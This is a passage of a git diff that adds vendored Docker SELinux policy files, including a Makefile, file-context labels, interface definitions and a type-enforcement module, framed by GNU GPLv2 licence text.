EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +convey the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. 
+ + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License along + with this program; if not, write to the Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. + +Also add information on how to contact you by electronic and paper mail. + +If the program is interactive, make it output a short notice like this +when it starts in an interactive mode: + + Gnomovision version 69, Copyright (C) year name of author + Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type `show c' for details. + +The hypothetical commands `show w' and `show c' should show the appropriate +parts of the General Public License. Of course, the commands you use may +be called something other than `show w' and `show c'; they could even be +mouse-clicks or menu items--whatever suits your program. + +You should also get your employer (if you work as a programmer) or your +school, if any, to sign a "copyright disclaimer" for the program, if +necessary. Here is a sample; alter the names: + + Yoyodyne, Inc., hereby disclaims all copyright interest in the program + `Gnomovision' (which makes passes at compilers) written by James Hacker. + + , 1 April 1989 + Ty Coon, President of Vice + +This General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may +consider it more useful to permit linking proprietary applications with the +library. If this is what you want to do, use the GNU Lesser General +Public License instead of this License. 
diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile new file mode 100644 index 0000000000..16df33ef32 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile @@ -0,0 +1,23 @@ +TARGETS?=docker +MODULES?=${TARGETS:=.pp.bz2} +SHAREDIR?=/usr/share + +all: ${TARGETS:=.pp.bz2} + +%.pp.bz2: %.pp + @echo Compressing $^ -\> $@ + bzip2 -9 $^ + +%.pp: %.te + make -f ${SHAREDIR}/selinux/devel/Makefile $@ + +clean: + rm -f *~ *.tc *.pp *.pp.bz2 + rm -rf tmp *.tar.gz + +man: install + sepolicy manpage --domain ${TARGETS}_t + +install: + semodule -i ${TARGETS} + diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md new file mode 100644 index 0000000000..7ea3117a89 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md @@ -0,0 +1 @@ +SELinux policy for docker diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc new file mode 100644 index 0000000000..d6cb0e5792 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc @@ -0,0 +1,29 @@ +/root/\.docker gen_context(system_u:object_r:docker_home_t,s0) + +/usr/bin/docker -- gen_context(system_u:object_r:docker_exec_t,s0) +/usr/bin/docker-novolume-plugin -- gen_context(system_u:object_r:docker_auth_exec_t,s0) +/usr/lib/docker/docker-novolume-plugin -- gen_context(system_u:object_r:docker_auth_exec_t,s0) + +/usr/lib/systemd/system/docker.service -- gen_context(system_u:object_r:docker_unit_file_t,s0) +/usr/lib/systemd/system/docker-novolume-plugin.service -- 
gen_context(system_u:object_r:docker_unit_file_t,s0) + +/etc/docker(/.*)? gen_context(system_u:object_r:docker_config_t,s0) + +/var/lib/docker(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) +/var/lib/kublet(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) +/var/lib/docker/vfs(/.*)? gen_context(system_u:object_r:svirt_sandbox_file_t,s0) + +/var/run/docker(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker\.pid -- gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker\.sock -s gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker-client(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) +/var/run/docker/plugins(/.*)? gen_context(system_u:object_r:docker_plugin_var_run_t,s0) + +/var/lock/lxc(/.*)? gen_context(system_u:object_r:docker_lock_t,s0) + +/var/log/lxc(/.*)? gen_context(system_u:object_r:docker_log_t,s0) + +/var/lib/docker/init(/.*)? gen_context(system_u:object_r:docker_share_t,s0) +/var/lib/docker/containers/.*/hosts gen_context(system_u:object_r:docker_share_t,s0) +/var/lib/docker/containers/.*/hostname gen_context(system_u:object_r:docker_share_t,s0) +/var/lib/docker/.*/config\.env gen_context(system_u:object_r:docker_share_t,s0) diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if new file mode 100644 index 0000000000..e087e8b98b --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if @@ -0,0 +1,523 @@ + +## The open-source application container engine. + +######################################## +## +## Execute docker in the docker domain. +## +## +## +## Domain allowed to transition. 
+## +## +# +interface(`docker_domtrans',` + gen_require(` + type docker_t, docker_exec_t; + ') + + corecmd_search_bin($1) + domtrans_pattern($1, docker_exec_t, docker_t) +') + +######################################## +## +## Execute docker in the caller domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_exec',` + gen_require(` + type docker_exec_t; + ') + + corecmd_search_bin($1) + can_exec($1, docker_exec_t) +') + +######################################## +## +## Search docker lib directories. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_search_lib',` + gen_require(` + type docker_var_lib_t; + ') + + allow $1 docker_var_lib_t:dir search_dir_perms; + files_search_var_lib($1) +') + +######################################## +## +## Execute docker lib directories. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_exec_lib',` + gen_require(` + type docker_var_lib_t; + ') + + allow $1 docker_var_lib_t:dir search_dir_perms; + can_exec($1, docker_var_lib_t) +') + +######################################## +## +## Read docker lib files. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_read_lib_files',` + gen_require(` + type docker_var_lib_t; + ') + + files_search_var_lib($1) + read_files_pattern($1, docker_var_lib_t, docker_var_lib_t) +') + +######################################## +## +## Read docker share files. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_read_share_files',` + gen_require(` + type docker_share_t; + ') + + files_search_var_lib($1) + list_dirs_pattern($1, docker_share_t, docker_share_t) + read_files_pattern($1, docker_share_t, docker_share_t) + read_lnk_files_pattern($1, docker_share_t, docker_share_t) +') + +###################################### +## +## Allow the specified domain to execute apache +## in the caller domain. +## +## +## +## Domain allowed access. 
+## +## +# +interface(`apache_exec',` + gen_require(` + type httpd_exec_t; + ') + + can_exec($1, httpd_exec_t) +') + +###################################### +## +## Allow the specified domain to execute docker shared files +## in the caller domain. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_exec_share_files',` + gen_require(` + type docker_share_t; + ') + + can_exec($1, docker_share_t) +') + +######################################## +## +## Manage docker lib files. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_manage_lib_files',` + gen_require(` + type docker_var_lib_t; + ') + + files_search_var_lib($1) + manage_files_pattern($1, docker_var_lib_t, docker_var_lib_t) + manage_lnk_files_pattern($1, docker_var_lib_t, docker_var_lib_t) +') + +######################################## +## +## Manage docker lib directories. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_manage_lib_dirs',` + gen_require(` + type docker_var_lib_t; + ') + + files_search_var_lib($1) + manage_dirs_pattern($1, docker_var_lib_t, docker_var_lib_t) +') + +######################################## +## +## Create objects in a docker var lib directory +## with an automatic type transition to +## a specified private type. +## +## +## +## Domain allowed access. +## +## +## +## +## The type of the object to create. +## +## +## +## +## The class of the object to be created. +## +## +## +## +## The name of the object being created. +## +## +# +interface(`docker_lib_filetrans',` + gen_require(` + type docker_var_lib_t; + ') + + filetrans_pattern($1, docker_var_lib_t, $2, $3, $4) +') + +######################################## +## +## Read docker PID files. +## +## +## +## Domain allowed access. 
+## +## +# +interface(`docker_read_pid_files',` + gen_require(` + type docker_var_run_t; + ') + + files_search_pids($1) + read_files_pattern($1, docker_var_run_t, docker_var_run_t) +') + +######################################## +## +## Execute docker server in the docker domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_systemctl',` + gen_require(` + type docker_t; + type docker_unit_file_t; + ') + + systemd_exec_systemctl($1) + init_reload_services($1) + systemd_read_fifo_file_passwd_run($1) + allow $1 docker_unit_file_t:file read_file_perms; + allow $1 docker_unit_file_t:service manage_service_perms; + + ps_process_pattern($1, docker_t) +') + +######################################## +## +## Read and write docker shared memory. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_rw_sem',` + gen_require(` + type docker_t; + ') + + allow $1 docker_t:sem rw_sem_perms; +') + +####################################### +## +## Read and write the docker pty type. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_use_ptys',` + gen_require(` + type docker_devpts_t; + ') + + allow $1 docker_devpts_t:chr_file rw_term_perms; +') + +####################################### +## +## Allow domain to create docker content +## +## +## +## Domain allowed access. 
+## +## +# +interface(`docker_filetrans_named_content',` + + gen_require(` + type docker_var_lib_t; + type docker_share_t; + type docker_log_t; + type docker_var_run_t; + type docker_home_t; + ') + + files_pid_filetrans($1, docker_var_run_t, file, "docker.pid") + files_pid_filetrans($1, docker_var_run_t, sock_file, "docker.sock") + files_pid_filetrans($1, docker_var_run_t, dir, "docker-client") + logging_log_filetrans($1, docker_log_t, dir, "lxc") + files_var_lib_filetrans($1, docker_var_lib_t, dir, "docker") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "config.env") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hosts") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hostname") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "resolv.conf") + filetrans_pattern($1, docker_var_lib_t, docker_share_t, dir, "init") + userdom_admin_home_dir_filetrans($1, docker_home_t, dir, ".docker") +') + +######################################## +## +## Connect to docker over a unix stream socket. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_stream_connect',` + gen_require(` + type docker_t, docker_var_run_t; + ') + + files_search_pids($1) + stream_connect_pattern($1, docker_var_run_t, docker_var_run_t, docker_t) +') + +######################################## +## +## Connect to SPC containers over a unix stream socket. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_spc_stream_connect',` + gen_require(` + type spc_t, spc_var_run_t; + ') + + files_search_pids($1) + files_write_all_pid_sockets($1) + allow $1 spc_t:unix_stream_socket connectto; +') + +######################################## +## +## All of the rules required to administrate +## an docker environment +## +## +## +## Domain allowed access. 
+## +## +# +interface(`docker_admin',` + gen_require(` + type docker_t; + type docker_var_lib_t, docker_var_run_t; + type docker_unit_file_t; + type docker_lock_t; + type docker_log_t; + type docker_config_t; + ') + + allow $1 docker_t:process { ptrace signal_perms }; + ps_process_pattern($1, docker_t) + + admin_pattern($1, docker_config_t) + + files_search_var_lib($1) + admin_pattern($1, docker_var_lib_t) + + files_search_pids($1) + admin_pattern($1, docker_var_run_t) + + files_search_locks($1) + admin_pattern($1, docker_lock_t) + + logging_search_logs($1) + admin_pattern($1, docker_log_t) + + docker_systemctl($1) + admin_pattern($1, docker_unit_file_t) + allow $1 docker_unit_file_t:service all_service_perms; + + optional_policy(` + systemd_passwd_agent_exec($1) + systemd_read_fifo_file_passwd_run($1) + ') +') + +######################################## +## +## Execute docker_auth_exec_t in the docker_auth domain. +## +## +## +## Domain allowed to transition. +## +## +# +interface(`docker_auth_domtrans',` + gen_require(` + type docker_auth_t, docker_auth_exec_t; + ') + + corecmd_search_bin($1) + domtrans_pattern($1, docker_auth_exec_t, docker_auth_t) +') + +###################################### +## +## Execute docker_auth in the caller domain. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_auth_exec',` + gen_require(` + type docker_auth_exec_t; + ') + + corecmd_search_bin($1) + can_exec($1, docker_auth_exec_t) +') + +######################################## +## +## Connect to docker_auth over a unix stream socket. +## +## +## +## Domain allowed access. +## +## +# +interface(`docker_auth_stream_connect',` + gen_require(` + type docker_auth_t, docker_plugin_var_run_t; + ') + + files_search_pids($1) + stream_connect_pattern($1, docker_plugin_var_run_t, docker_plugin_var_run_t, docker_auth_t) +') + +######################################## +## +## docker domain typebounds calling domain. +## +## +## +## Domain to be typebound. 
+## +## +# +interface(`docker_typebounds',` + gen_require(` + type docker_t; + ') + + typebounds docker_t $1; +') + +######################################## +## +## Allow any docker_exec_t to be an entrypoint of this domain +## +## +## +## Domain allowed access. +## +## +## +# +interface(`docker_entrypoint',` + gen_require(` + type docker_exec_t; + ') + allow $1 docker_exec_t:file entrypoint; +') diff --git a/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te new file mode 100644 index 0000000000..4231688382 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te @@ -0,0 +1,399 @@ +policy_module(docker, 1.0.0) + +######################################## +# +# Declarations +# + +## +##

+## Determine whether docker can +## connect to all TCP ports. +##

+##
+gen_tunable(docker_connect_any, false) + +type docker_t; +type docker_exec_t; +init_daemon_domain(docker_t, docker_exec_t) +domain_subj_id_change_exemption(docker_t) +domain_role_change_exemption(docker_t) + +type spc_t; +domain_type(spc_t) +role system_r types spc_t; + +type docker_auth_t; +type docker_auth_exec_t; +init_daemon_domain(docker_auth_t, docker_auth_exec_t) + +type spc_var_run_t; +files_pid_file(spc_var_run_t) + +type docker_var_lib_t; +files_type(docker_var_lib_t) + +type docker_home_t; +userdom_user_home_content(docker_home_t) + +type docker_config_t; +files_config_file(docker_config_t) + +type docker_lock_t; +files_lock_file(docker_lock_t) + +type docker_log_t; +logging_log_file(docker_log_t) + +type docker_tmp_t; +files_tmp_file(docker_tmp_t) + +type docker_tmpfs_t; +files_tmpfs_file(docker_tmpfs_t) + +type docker_var_run_t; +files_pid_file(docker_var_run_t) + +type docker_plugin_var_run_t; +files_pid_file(docker_plugin_var_run_t) + +type docker_unit_file_t; +systemd_unit_file(docker_unit_file_t) + +type docker_devpts_t; +term_pty(docker_devpts_t) + +type docker_share_t; +files_type(docker_share_t) + +######################################## +# +# docker local policy +# +allow docker_t self:capability { chown kill fowner fsetid mknod net_admin net_bind_service net_raw setfcap }; +allow docker_t self:tun_socket relabelto; +allow docker_t self:process { getattr signal_perms setrlimit setfscreate }; +allow docker_t self:fifo_file rw_fifo_file_perms; +allow docker_t self:unix_stream_socket create_stream_socket_perms; +allow docker_t self:tcp_socket create_stream_socket_perms; +allow docker_t self:udp_socket create_socket_perms; +allow docker_t self:capability2 block_suspend; + +docker_auth_stream_connect(docker_t) + +manage_files_pattern(docker_t, docker_home_t, docker_home_t) +manage_dirs_pattern(docker_t, docker_home_t, docker_home_t) +manage_lnk_files_pattern(docker_t, docker_home_t, docker_home_t) +userdom_admin_home_dir_filetrans(docker_t, 
docker_home_t, dir, ".docker") + +manage_dirs_pattern(docker_t, docker_config_t, docker_config_t) +manage_files_pattern(docker_t, docker_config_t, docker_config_t) +files_etc_filetrans(docker_t, docker_config_t, dir, "docker") + +manage_dirs_pattern(docker_t, docker_lock_t, docker_lock_t) +manage_files_pattern(docker_t, docker_lock_t, docker_lock_t) +files_lock_filetrans(docker_t, docker_lock_t, { dir file }, "lxc") + +manage_dirs_pattern(docker_t, docker_log_t, docker_log_t) +manage_files_pattern(docker_t, docker_log_t, docker_log_t) +manage_lnk_files_pattern(docker_t, docker_log_t, docker_log_t) +logging_log_filetrans(docker_t, docker_log_t, { dir file lnk_file }) +allow docker_t docker_log_t:dir_file_class_set { relabelfrom relabelto }; + +manage_dirs_pattern(docker_t, docker_tmp_t, docker_tmp_t) +manage_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) +manage_lnk_files_pattern(docker_t, docker_tmp_t, docker_tmp_t) +files_tmp_filetrans(docker_t, docker_tmp_t, { dir file lnk_file }) + +manage_dirs_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_lnk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_fifo_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_chr_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +manage_blk_files_pattern(docker_t, docker_tmpfs_t, docker_tmpfs_t) +allow docker_t docker_tmpfs_t:dir relabelfrom; +can_exec(docker_t, docker_tmpfs_t) +fs_tmpfs_filetrans(docker_t, docker_tmpfs_t, { dir file }) +allow docker_t docker_tmpfs_t:chr_file mounton; + +manage_dirs_pattern(docker_t, docker_share_t, docker_share_t) +manage_files_pattern(docker_t, docker_share_t, docker_share_t) +manage_lnk_files_pattern(docker_t, docker_share_t, docker_share_t) +allow docker_t docker_share_t:dir_file_class_set { relabelfrom relabelto }; + +can_exec(docker_t, docker_share_t) +#docker_filetrans_named_content(docker_t) + +manage_dirs_pattern(docker_t, 
docker_var_lib_t, docker_var_lib_t) +manage_chr_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_blk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +manage_lnk_files_pattern(docker_t, docker_var_lib_t, docker_var_lib_t) +allow docker_t docker_var_lib_t:dir_file_class_set { relabelfrom relabelto }; +files_var_lib_filetrans(docker_t, docker_var_lib_t, { dir file lnk_file }) + +manage_dirs_pattern(docker_t, docker_var_run_t, docker_var_run_t) +manage_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) +manage_sock_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) +manage_lnk_files_pattern(docker_t, docker_var_run_t, docker_var_run_t) +files_pid_filetrans(docker_t, docker_var_run_t, { dir file lnk_file sock_file }) + +allow docker_t docker_devpts_t:chr_file { relabelfrom rw_chr_file_perms setattr_chr_file_perms }; +term_create_pty(docker_t, docker_devpts_t) + +kernel_read_system_state(docker_t) +kernel_read_network_state(docker_t) +kernel_read_all_sysctls(docker_t) +kernel_rw_net_sysctls(docker_t) +kernel_setsched(docker_t) +kernel_read_all_proc(docker_t) + +domain_use_interactive_fds(docker_t) +domain_dontaudit_read_all_domains_state(docker_t) + +corecmd_exec_bin(docker_t) +corecmd_exec_shell(docker_t) + +corenet_tcp_bind_generic_node(docker_t) +corenet_tcp_sendrecv_generic_if(docker_t) +corenet_tcp_sendrecv_generic_node(docker_t) +corenet_tcp_sendrecv_generic_port(docker_t) +corenet_tcp_bind_all_ports(docker_t) +corenet_tcp_connect_http_port(docker_t) +corenet_tcp_connect_commplex_main_port(docker_t) +corenet_udp_sendrecv_generic_if(docker_t) +corenet_udp_sendrecv_generic_node(docker_t) +corenet_udp_sendrecv_all_ports(docker_t) +corenet_udp_bind_generic_node(docker_t) +corenet_udp_bind_all_ports(docker_t) + +files_read_config_files(docker_t) +files_dontaudit_getattr_all_dirs(docker_t) +files_dontaudit_getattr_all_files(docker_t) + 
+fs_read_cgroup_files(docker_t) +fs_read_tmpfs_symlinks(docker_t) +fs_search_all(docker_t) +fs_getattr_all_fs(docker_t) + +storage_raw_rw_fixed_disk(docker_t) + +auth_use_nsswitch(docker_t) +auth_dontaudit_getattr_shadow(docker_t) + +init_read_state(docker_t) +init_status(docker_t) + +logging_send_audit_msgs(docker_t) +logging_send_syslog_msg(docker_t) + +miscfiles_read_localization(docker_t) + +mount_domtrans(docker_t) + +seutil_read_default_contexts(docker_t) +seutil_read_config(docker_t) + +sysnet_dns_name_resolve(docker_t) +sysnet_exec_ifconfig(docker_t) + +optional_policy(` + rpm_exec(docker_t) + rpm_read_db(docker_t) + rpm_exec(docker_t) +') + +optional_policy(` + fstools_domtrans(docker_t) +') + +optional_policy(` + iptables_domtrans(docker_t) +') + +optional_policy(` + openvswitch_stream_connect(docker_t) +') + +# +# lxc rules +# + +allow docker_t self:capability { dac_override setgid setpcap setuid sys_admin sys_boot sys_chroot sys_ptrace }; + +allow docker_t self:process { getcap setcap setexec setpgid setsched signal_perms }; + +allow docker_t self:netlink_route_socket rw_netlink_socket_perms;; +allow docker_t self:netlink_audit_socket create_netlink_socket_perms; +allow docker_t self:unix_dgram_socket { create_socket_perms sendto }; +allow docker_t self:unix_stream_socket { create_stream_socket_perms connectto }; + +allow docker_t docker_var_lib_t:dir mounton; +allow docker_t docker_var_lib_t:chr_file mounton; +can_exec(docker_t, docker_var_lib_t) + +kernel_dontaudit_setsched(docker_t) +kernel_get_sysvipc_info(docker_t) +kernel_request_load_module(docker_t) +kernel_mounton_messages(docker_t) +kernel_mounton_all_proc(docker_t) +kernel_mounton_all_sysctls(docker_t) +kernel_unlabeled_entry_type(spc_t) +kernel_unlabeled_domtrans(docker_t, spc_t) + +dev_getattr_all(docker_t) +dev_getattr_sysfs_fs(docker_t) +dev_read_urand(docker_t) +dev_read_lvm_control(docker_t) +dev_rw_sysfs(docker_t) +dev_rw_loop_control(docker_t) +dev_rw_lvm_control(docker_t) + 
+files_getattr_isid_type_dirs(docker_t) +files_manage_isid_type_dirs(docker_t) +files_manage_isid_type_files(docker_t) +files_manage_isid_type_symlinks(docker_t) +files_manage_isid_type_chr_files(docker_t) +files_manage_isid_type_blk_files(docker_t) +files_exec_isid_files(docker_t) +files_mounton_isid(docker_t) +files_mounton_non_security(docker_t) +files_mounton_isid_type_chr_file(docker_t) + +fs_mount_all_fs(docker_t) +fs_unmount_all_fs(docker_t) +fs_remount_all_fs(docker_t) +files_mounton_isid(docker_t) +fs_manage_cgroup_dirs(docker_t) +fs_manage_cgroup_files(docker_t) +fs_relabelfrom_xattr_fs(docker_t) +fs_relabelfrom_tmpfs(docker_t) +fs_read_tmpfs_symlinks(docker_t) +fs_list_hugetlbfs(docker_t) + +term_use_generic_ptys(docker_t) +term_use_ptmx(docker_t) +term_getattr_pty_fs(docker_t) +term_relabel_pty_fs(docker_t) +term_mounton_unallocated_ttys(docker_t) + +modutils_domtrans_insmod(docker_t) + +systemd_status_all_unit_files(docker_t) +systemd_start_systemd_services(docker_t) + +userdom_stream_connect(docker_t) +userdom_search_user_home_content(docker_t) +userdom_read_all_users_state(docker_t) +userdom_relabel_user_home_files(docker_t) +userdom_relabel_user_tmp_files(docker_t) +userdom_relabel_user_tmp_dirs(docker_t) + +optional_policy(` + gpm_getattr_gpmctl(docker_t) +') + +optional_policy(` + dbus_system_bus_client(docker_t) + init_dbus_chat(docker_t) + init_start_transient_unit(docker_t) + + optional_policy(` + systemd_dbus_chat_logind(docker_t) + systemd_dbus_chat_machined(docker_t) + ') + + optional_policy(` + firewalld_dbus_chat(docker_t) + ') +') + +optional_policy(` + udev_read_db(docker_t) +') + +optional_policy(` + unconfined_domain(docker_t) + unconfined_typebounds(docker_t) +') + +optional_policy(` + virt_read_config(docker_t) + virt_exec(docker_t) + virt_stream_connect(docker_t) + virt_stream_connect_sandbox(docker_t) + virt_exec_sandbox_files(docker_t) + virt_manage_sandbox_files(docker_t) + virt_relabel_sandbox_filesystem(docker_t) + # for lxc + 
virt_transition_svirt_sandbox(docker_t, system_r) + virt_mounton_sandbox_file(docker_t) +# virt_attach_sandbox_tun_iface(docker_t) + allow docker_t svirt_sandbox_domain:tun_socket relabelfrom; + virt_sandbox_entrypoint(docker_t) +') + +tunable_policy(`docker_connect_any',` + corenet_tcp_connect_all_ports(docker_t) + corenet_sendrecv_all_packets(docker_t) + corenet_tcp_sendrecv_all_ports(docker_t) +') + +######################################## +# +# spc local policy +# +allow spc_t { docker_var_lib_t docker_share_t }:file entrypoint; +role system_r types spc_t; + +domtrans_pattern(docker_t, docker_share_t, spc_t) +domtrans_pattern(docker_t, docker_var_lib_t, spc_t) +allow docker_t spc_t:process { setsched signal_perms }; +ps_process_pattern(docker_t, spc_t) +allow docker_t spc_t:socket_class_set { relabelto relabelfrom }; +filetrans_pattern(docker_t, docker_var_lib_t, docker_share_t, dir, "overlay") + +optional_policy(` + systemd_dbus_chat_machined(spc_t) +') + +optional_policy(` + dbus_chat_system_bus(spc_t) +') + +optional_policy(` + unconfined_domain_noaudit(spc_t) +') + +optional_policy(` + virt_transition_svirt_sandbox(spc_t, system_r) + virt_sandbox_entrypoint(spc_t) +') + +######################################## +# +# docker_auth local policy +# +allow docker_auth_t self:fifo_file rw_fifo_file_perms; +allow docker_auth_t self:unix_stream_socket create_stream_socket_perms; +dontaudit docker_auth_t self:capability net_admin; + +docker_stream_connect(docker_auth_t) + +manage_dirs_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) +manage_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) +manage_sock_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) +manage_lnk_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) +files_pid_filetrans(docker_auth_t, docker_plugin_var_run_t, { dir file lnk_file sock_file }) + +domain_use_interactive_fds(docker_auth_t) + 
+kernel_read_net_sysctls(docker_auth_t) + +auth_use_nsswitch(docker_auth_t) + +files_read_etc_files(docker_auth_t) + +miscfiles_read_localization(docker_auth_t) + +sysnet_dns_name_resolve(docker_auth_t) diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE new file mode 100644 index 0000000000..d511905c16 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE @@ -0,0 +1,339 @@ + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. 
+ + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. 
